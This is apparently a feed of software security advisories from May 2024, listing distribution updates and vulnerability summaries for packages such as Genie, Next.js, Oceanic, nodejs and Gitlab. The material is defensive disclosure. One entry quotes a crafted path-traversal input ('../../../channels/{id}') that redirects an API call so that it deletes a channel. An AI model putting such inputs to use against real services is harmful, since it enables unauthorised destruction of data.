10.05.2024 17:34:16rockylinux[RLEA-2024:2400] crypto-policies bug fix and enhancement update (none)An update is available for crypto-policies.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2400
10.05.2024 17:34:16rockylinux[RLBA-2024:2407] xfsdump bug fix and enhancement update (none)An update is available for xfsdump.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2407
10.05.2024 17:34:16rockylinux[RLBA-2024:2408] wireless-regdb bug fix and enhancement update (none)An update is available for wireless-regdb.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2408
10.05.2024 17:34:16rockylinux[RLBA-2024:2411] e2fsprogs bug fix and enhancement update (none)An update is available for e2fsprogs.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2411
10.05.2024 17:34:16rockylinux[RLBA-2024:2412] python-urllib3 bug fix and enhancement update (none)An update is available for python-urllib3.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2412
10.05.2024 17:34:16rockylinux[RLBA-2024:2420] tuna bug fix and enhancement update (none)An update is available for tuna.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2420
10.05.2024 17:34:16rockylinux[RLBA-2024:2423] autofs bug fix and enhancement update (none)An update is available for autofs.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2423
10.05.2024 17:34:15rockylinux[RLSA-2024:1692] less security update (moderate)An update is available for less.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1692
10.05.2024 17:34:16rockylinux[RLEA-2024:2421] python-configshell bug fix and enhancement update (none)An update is available for python-configshell.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2421
10.05.2024 17:34:16rockylinux[RLEA-2024:2424] libnvme bug fix and enhancement update (none)An update is available for libnvme.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2424
10.05.2024 17:34:16rockylinux[RLBA-2024:2428] glib2 bug fix and enhancement update (none)An update is available for glib2.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2428
10.05.2024 17:34:16rockylinux[RLBA-2024:2429] rdma-core bug fix and enhancement update (none)An update is available for rdma-core.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2429
10.05.2024 17:34:17rockylinux[RLBA-2024:2427] elfutils bug fix and enhancement update (none)An update is available for elfutils.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2427
10.05.2024 17:34:17rockylinux[RLBA-2024:2439] libsemanage bug fix and enhancement update (none)An update is available for libsemanage.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2439
10.05.2024 17:34:17rockylinux[RLBA-2024:2434] dnf bug fix and enhancement update (none)An update is available for dnf.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2434
10.05.2024 17:34:17rockylinux[RLBA-2024:2440] libsepol bug fix and enhancement update (none)An update is available for libsepol.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2440
10.05.2024 17:34:17rockylinux[RLBA-2024:2451] numad bug fix and enhancement update (none)An update is available for numad.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2451
10.05.2024 17:34:17rockylinux[RLBA-2024:2452] acl bug fix and enhancement update (none)An update is available for acl.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2452
10.05.2024 17:34:17rockylinux[RLSA-2024:2463] systemd security update (moderate)An update is available for systemd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2463
10.05.2024 17:34:17rockylinux[RLBA-2024:2468] libtalloc bug fix and enhancement update (none)An update is available for libtalloc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2468
10.05.2024 17:34:17rockylinux[RLBA-2024:2467] hwdata bug fix and enhancement update (none)An update is available for hwdata.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2467
10.05.2024 17:34:17rockylinux[RLBA-2024:2464] xfsprogs bug fix and enhancement update (none)An update is available for xfsprogs.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2464
10.05.2024 17:34:18rockylinux[RLBA-2024:2472] libtdb bug fix and enhancement update (none)An update is available for libtdb.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2472
10.05.2024 17:34:18rockylinux[RLBA-2024:2493] nftables bug fix and enhancement update (none)An update is available for nftables.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2493
10.05.2024 17:34:18rockylinux[RLBA-2024:2488] device-mapper-persistent-data bug fix and enhancement update (none)An update is available for device-mapper-persistent-data.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2488
10.05.2024 17:34:18rockylinux[RLBA-2024:2489] libbpf bug fix and enhancement update (none)An update is available for libbpf.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2489
10.05.2024 17:34:18rockylinux[RLBA-2024:2494] firewalld bug fix and enhancement update (none)An update is available for firewalld.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2494
10.05.2024 17:34:18rockylinux[RLBA-2024:2496] iptables bug fix and enhancement update (none)An update is available for iptables.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2496
10.05.2024 17:34:18rockylinux[RLBA-2024:2497] lvm2 bug fix and enhancement update (none)An update is available for lvm2.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2497
10.05.2024 17:34:18rockylinux[RLBA-2024:2501] iw bug fix and enhancement update (none)An update is available for iw.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2501
10.05.2024 17:34:18rockylinux[RLBA-2024:2502] rpcbind bug fix and enhancement update (none)An update is available for rpcbind.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2502
10.05.2024 17:34:18rockylinux[RLBA-2024:2510] libtirpc bug fix and enhancement update (none)An update is available for libtirpc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2510
10.05.2024 17:34:18rockylinux[RLSA-2024:2512] file security update (low)An update is available for file.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2512
10.05.2024 17:34:18rockylinux[RLBA-2024:2515] iproute bug fix and enhancement update (none)An update is available for iproute.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2515
10.05.2024 17:34:19rockylinux[RLBA-2024:2518] expat bug fix and enhancement update (none)An update is available for expat.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2518
10.05.2024 17:34:19rockylinux[RLBA-2024:2520] bash-completion bug fix and enhancement update (none)An update is available for bash-completion.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2520
10.05.2024 17:34:19rockylinux[RLSA-2024:2679] libxml2 security update (moderate)An update is available for libxml2.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2679
10.05.2024 17:34:19rockylinux[RLSA-2024:2517] wpa_supplicant security update (moderate)An update is available for wpa_supplicant.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2517
10.05.2024 17:34:19rockylinux[RLSA-2024:2570] gnutls security update (moderate)An update is available for gnutls.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2570
10.05.2024 17:34:19rockylinux[RLSA-2024:2571] sssd security and bug fix update (moderate)An update is available for sssd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2571
10.05.2024 17:34:15rockylinux[RLSA-2024:2758] kernel security and bug fix update (moderate)An update is available for kernel.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2758
10.05.2024 03:00:00debian[DSA-5687-1] chromiumsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5687-1
10.05.2024 03:00:00oraclelinux[ELSA-2024-2780] nodejs:18 security update (important)nodejs [1:18.20.2-1] - Removes .ps1 files - Rebase to 18.20.2 - Fixes: CVE-2024-27983, CVE-2024-28182, CVE-2024-27982, CVE-2024-25629; nodejs-nodemon; nodejs-packaginghttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2780
10.05.2024 21:03:03maven[MAVEN:GHSA-WPCV-5JGP-69F3] Genie Path Traversal vulnerability via File Uploads (critical)Overview: Path Traversal Vulnerability via File Uploads in Genie. Impact: Any Genie OSS users running their own instance and relying on the filesystem to store file attachments submitted to the Genie application may be impacted. Using this technique, it is possible to write a file with any user-specified filename and file contents to any location on the file system that the Java process has write access to, potentially leading to remote code execution (RCE). Genie users who do not store these attachments locally on the underlying file system are not vulnerable to this issue. Description: Genie's API accepts a multipart/form-data file upload which can be saved to a location on disk. However, it takes a user-supplied filename as part of the request and uses this as the filename when writing the file to disk. Since this filename is user-controlled, it is possible for a malicious actor to manipulate the filename in order to break out of the default attachment storage path and perform path traversal. Using this technique it is possible to write a file with any user-specified name and file contents to any location on the file system that the Java process has write access to. Patches: This path traversal issue is fixed in Genie OSS v4.3.18. This issue was fixed in https://github.com/Netflix/genie/pull/1216 and https://github.com/Netflix/genie/pull/1217 and a [new release](https://github.com/Netflix/genie/releases/tag/v4.3.18) with the fix was created. Please upgrade your Genie OSS instances to the new version.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WPCV-5JGP-69F3
10.05.2024 00:31:38npm[NPM:GHSA-G49Q-JW42-6X85] thelounge may publicly disclose all usernames/idents via port 113 (low)Per RFC 1413, the unique identifying tuple includes not only the ports but also both addresses. Without the addresses, the information becomes both non-unique and public: - If multiple connections happen to use the same local port number (which is possible if the addresses differ), the username of the first is returned for all, resulting in the wrong ident for all but the first. - By not checking the connection address, the information becomes public. Because there is only a relatively small number of local ports, and the remote ports are likely to be either 6667 or 6697, it becomes trivial to scan the entire range to get a list of idents. To prevent this from happening, disable identd or upgrade to a non-vulnerable version.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G49Q-JW42-6X85
10.05.2024 00:18:58npm[NPM:GHSA-FR5H-RQP8-MJ6G] Next.js Server-Side Request Forgery in Server Actions (high)Impact: A Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. Prerequisites: * Next.js (`<14.1.1`) is running in a self-hosted (*) manner. * The Next.js application makes use of Server Actions. * The Server Action performs a redirect to a relative path which starts with a `/`. (*) Many hosting providers (including Vercel) route requests based on the Host header, so we do not believe that this vulnerability affects any Next.js applications where routing is done in this manner. Patches: This vulnerability was patched in [#62561](https://github.com/vercel/next.js/pull/62561) and fixed in Next.js `14.1.1`. Workarounds: There are no official workarounds for this vulnerability. We recommend upgrading to Next.js `14.1.1`. Credit: Vercel and the Next.js team thank Assetnote for responsibly disclosing this issue to us, and for working with us to verify the fix. Thanks to: Adam Kues (Assetnote), Shubham Shah (Assetnote).https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FR5H-RQP8-MJ6G
10.05.2024 00:07:01npm[NPM:GHSA-77R5-GW3J-2MPF] Next.js Vulnerable to HTTP Request Smuggling (high)Impact: Inconsistent interpretation of a crafted HTTP request meant that requests were treated as both a single request and two separate requests by Next.js, leading to desynchronized responses. This led to a response queue poisoning vulnerability in the affected Next.js versions. For a request to be exploitable, the affected route also had to be making use of the [rewrites](https://nextjs.org/docs/app/api-reference/next-config-js/rewrites) feature in Next.js. Patches: The vulnerability is resolved in Next.js `13.5.1` and newer. This includes Next.js `14.x`. Workarounds: There are no official workarounds for this vulnerability. We recommend that you upgrade to a safe version. References: https://portswigger.net/web-security/request-smuggling/advanced/response-queue-poisoning https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-77R5-GW3J-2MPF
09.05.2024 20:46:06ubuntu[USN-6770-1] Fossil regressionFossil regressionhttps://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6770-1
09.05.2024 20:03:34suse[SUSE-SU-2024:1581-1] Security update for the Linux Kernel (Live Patch 39 for SLE 15 SP2) (important)Security update for the Linux Kernel (Live Patch 39 for SLE 15 SP2)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1581-1
09.05.2024 19:56:13go[GO-2024-2721] Cross site scripting in github.com/tiagorlampert/CHAOSA malicious actor may be able to extract a JWT token via a malicious "/command" request. This is a form of cross site scripting (XSS).https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2721
09.05.2024 18:54:15ubuntu[USN-6769-1] Spreadsheet::ParseXLSX vulnerabilities (medium)Several security issues were fixed in libspreadsheet-parsexlsx-perl.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6769-1
09.05.2024 17:33:42 | suse | [SUSE-SU-2024:1580-1] Security update for the Linux Kernel (Live Patch 39 for SLE 15 SP3) (important) | Security update for the Linux Kernel (Live Patch 39 for SLE 15 SP3) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1580-1
09.05.2024 16:48:41 | suse | [SUSE-SU-2024:1579-1] Security update for sssd (important) | Security update for sssd | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1579-1
09.05.2024 16:47:20 | suse | [SUSE-SU-2024:1578-1] Security update for sssd (important) | Security update for sssd | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1578-1
09.05.2024 16:13:10 | ubuntu | [USN-6768-1] GLib vulnerability | GLib could be made to accept spoofed D-Bus signals. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6768-1
09.05.2024 14:18:39 | suse | [SUSE-SU-2024:1574-1] Security update for go1.21 (moderate) | Security update for go1.21 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1574-1
09.05.2024 14:18:26 | suse | [SUSE-SU-2024:1573-1] Security update for go1.22 (moderate) | Security update for go1.22 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1573-1
09.05.2024 14:18:15 | suse | [SUSE-SU-2024:1572-1] Security update for python-Werkzeug (important) | Security update for python-Werkzeug | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1572-1
09.05.2024 14:18:01 | suse | [SUSE-SU-2024:1571-1] Security update for python-pymongo (important) | Security update for python-pymongo | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1571-1
09.05.2024 14:17:29 | suse | [SUSE-SU-2024:1569-1] Security update for avahi (moderate) | Security update for avahi | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1569-1
09.05.2024 14:17:16 | suse | [SUSE-SU-2024:1568-1] Security update for ghostscript (moderate) | Security update for ghostscript | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1568-1
09.05.2024 12:01:09 | suse | [SUSE-SU-2024:1563-1] Security update for sssd (important) | Security update for sssd | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1563-1
09.05.2024 07:13:02 | go | [GO-2024-2822] Arbitrary code execution in github.com/tiagorlampert/CHAOS | A remote attacker can execute arbitrary commands via crafted HTTP requests. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2822
09.05.2024 15:14:55 | almalinux | [ALSA-2024:2778] nodejs:20 security update (important) | nodejs:20 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2778
09.05.2024 15:12:52 | almalinux | [ALSA-2024:2780] nodejs:18 security update (important) | nodejs:18 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2780
09.05.2024 03:00:00 | debian | [DSA-5682-2] glib2.0 | regression update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5682-2
09.05.2024 03:00:00 | debian | [DSA-5686-1] dav1d (medium) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5686-1
09.05.2024 03:00:00 | freebsd | [FREEBSD:D53C30C1-0D7B-11EF-BA02-6CC21735F730] PostgreSQL server -- Potentially allowing authenticated database users to see data that they shouldn't. | PostgreSQL project reports: A security vulnerability was found in the system views pg_stats_ext and pg_stats_ext_exprs, potentially allowing authenticated database users to see data they shouldn't. If this is of concern in your installation, run the SQL script /usr/local/share/postgresql/fix-CVE-2024-4317.sql for each of your databases. See the link for details. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:D53C30C1-0D7B-11EF-BA02-6CC21735F730
09.05.2024 03:00:00 | freebsd | [FREEBSD:EC994672-5284-49A5-A7FC-93C02126E5FB] electron29 -- multiple vulnerabilities | Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-3914. Security: backported fix for CVE-2024-4558. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:EC994672-5284-49A5-A7FC-93C02126E5FB
09.05.2024 03:00:00 | oraclelinux | [ELSA-2024-2778] nodejs:20 security update (important) | nodejs [1:20.12.2-2] - Backport nghttp2 patch for CVE-2024-28182; [1:20.12.2-1] - Rebase to version 20.12.0; Fixes: CVE-2024-27983 CVE-2024-27982 CVE-2024-22025 (node); Fixes: CVE-2024-25629 (c-ares); nodejs-nodemon; nodejs-packaging | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2778
09.05.2024 03:00:00 | redhat | [RHSA-2024:2778] nodejs:20 security update (important) | Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es): * c-ares: Out of bounds read in ares__read_line() (CVE-2024-25629) * nghttp2: CONTINUATION frames DoS (CVE-2024-28182) * nodejs: using the fetch() function to retrieve content from an untrusted URL leads to denial of service (CVE-2024-22025) * nodejs: CONTINUATION frames DoS (CVE-2024-27983) * nodejs: HTTP Request Smuggling via Content Length Obfuscation (CVE-2024-27982) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2778
09.05.2024 03:00:00 | redhat | [RHSA-2024:2780] nodejs:18 security update (important) | Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es): * nodejs: CONTINUATION frames DoS (CVE-2024-27983) * nodejs: using the fetch() function to retrieve content from an untrusted URL leads to denial of service (CVE-2024-22025) * nodejs: HTTP Request Smuggling via Content Length Obfuscation (CVE-2024-27982) * nghttp2: CONTINUATION frames DoS (CVE-2024-28182) * c-ares: Out of bounds read in ares__read_line() (CVE-2024-25629) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2780
09.05.2024 03:00:00 | redhat | [RHSA-2024:2779] nodejs:18 security update (important) | Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es): * nodejs: CONTINUATION frames DoS (CVE-2024-27983) * nodejs: using the fetch() function to retrieve content from an untrusted URL leads to denial of service (CVE-2024-22025) * nodejs: HTTP Request Smuggling via Content Length Obfuscation (CVE-2024-27982) * nghttp2: CONTINUATION frames DoS (CVE-2024-28182) * c-ares: Out of bounds read in ares__read_line() (CVE-2024-25629) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2779
09.05.2024 00:50:04 | go | [GO-2024-2821] Denial of Service from untrusted requests in github.com/stacklok/minder (high) | HandleGithubWebhook is susceptible to a denial of service attack from an untrusted HTTP request. An untrusted request can cause the server to allocate large amounts of memory resulting in a denial of service. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2821
09.05.2024 03:00:00 | freebsd | [FREEBSD:EE6936DA-0DDD-11EF-9C21-901B0E9408DC] tailscale -- Insufficient inbound packet filtering in subnet routers and exit nodes | Tailscale team reports: In Tailscale versions earlier than 1.66.0, exit nodes, subnet routers, and app connectors could allow inbound connections to other tailnet nodes from their local area network (LAN). This vulnerability only affects Linux exit nodes, subnet routers, and app connectors in tailnets where ACLs allow "src": "*", such as with default ACLs. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:EE6936DA-0DDD-11EF-9C21-901B0E9408DC
09.05.2024 03:00:00 | freebsd | [FREEBSD:FBC2C629-0DC5-11EF-9850-001B217B3468] Gitlab -- vulnerabilities | Gitlab reports: ReDoS in branch search when using wildcards; ReDoS in markdown render pipeline; Redos on Discord integrations; Redos on Google Chat Integration; Denial of Service Attack via Pin Menu; DoS by filtering tags and branches via the API; MR approval via CSRF in SAML SSO; Banned user from groups can read issues updates via the api; Require confirmation before linking JWT identity; View confidential issues title and description of any public project via export; SSRF via Github importer | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:FBC2C629-0DC5-11EF-9850-001B217B3468
15.05.2024 03:00:00 | mozilla | [MFSA-2024-23] Security Vulnerabilities fixed in Thunderbird 115.11 (high) | In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts. | https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-23
14.05.2024 23:14:00 | npm | [NPM:GHSA-5H5V-HW44-F6GG] Oceanic allows unsanitized user input to lead to path traversal in URLs (moderate) | Impact: Input to functions such as `Client.rest.channels.removeBan` is not url-encoded, resulting in specially crafted input such as `../../../channels/{id}` being normalized into the url `/api/v10/channels/{id}`, and deleting a channel rather than removing a ban. Workarounds: * Sanitizing user input, ensuring strings are valid for the purpose they are being used for. * Encoding input with `encodeURIComponent` before providing it to the library. References: OceanicJS/Oceanic@8bf8ee8373b8c565fbdbf70a609aba4fbc1a1ffe | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5H5V-HW44-F6GG
14.05.2024 22:27:14 | slackware | [SSA:2024-135-01] mozilla-firefox | New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues. Here are the details from the Slackware 15.0 ChangeLog: patches/packages/mozilla-firefox-115.11.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.11.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-22/ https://www.cve.org/CVERecord?id=CVE-2024-4367 https://www.cve.org/CVERecord?id=CVE-2024-4767 https://www.cve.org/CVERecord?id=CVE-2024-4768 https://www.cve.org/CVERecord?id=CVE-2024-4769 https://www.cve.org/CVERecord?id=CVE-2024-4770 https://www.cve.org/CVERecord?id=CVE-2024-4777 (* Security fix *) Where to find the new packages: Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.11.0esr-i686-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.11.0esr-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-126.0-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-126.0-x86_64-1.txz MD5 signatures: Slackware 15.0 package: 0e9a26b221f26fb5463ef7bba9caa110 mozilla-firefox-115.11.0esr-i686-1_slack15.0.txz; Slackware x86_64 15.0 package: 07aa240561e462cb32a03ebe4d62e5a1 mozilla-firefox-115.11.0esr-x86_64-1_slack15.0.txz; Slackware -current package: 434d84886cc0b14db6e8b842fff25ac6 xap/mozilla-firefox-126.0-i686-1.txz; Slackware x86_64 -current package: 058e5714e8cc539ced89668971b69629 xap/mozilla-firefox-126.0-x86_64-1.txz. Installation instructions: Upgrade the package as root: `# upgradepkg mozilla-firefox-115.11.0esr-i686-1_slack15.0.txz` | https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-135-01
15.05.2024 00:47:55 | npm | [NPM:GHSA-93PF-MRC8-4G3H] Konga is vulnerable to Cross Site Scripting (XSS) attacks (moderate) | Konga v0.14.9 is vulnerable to Cross Site Scripting (XSS) via the username parameter. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-93PF-MRC8-4G3H
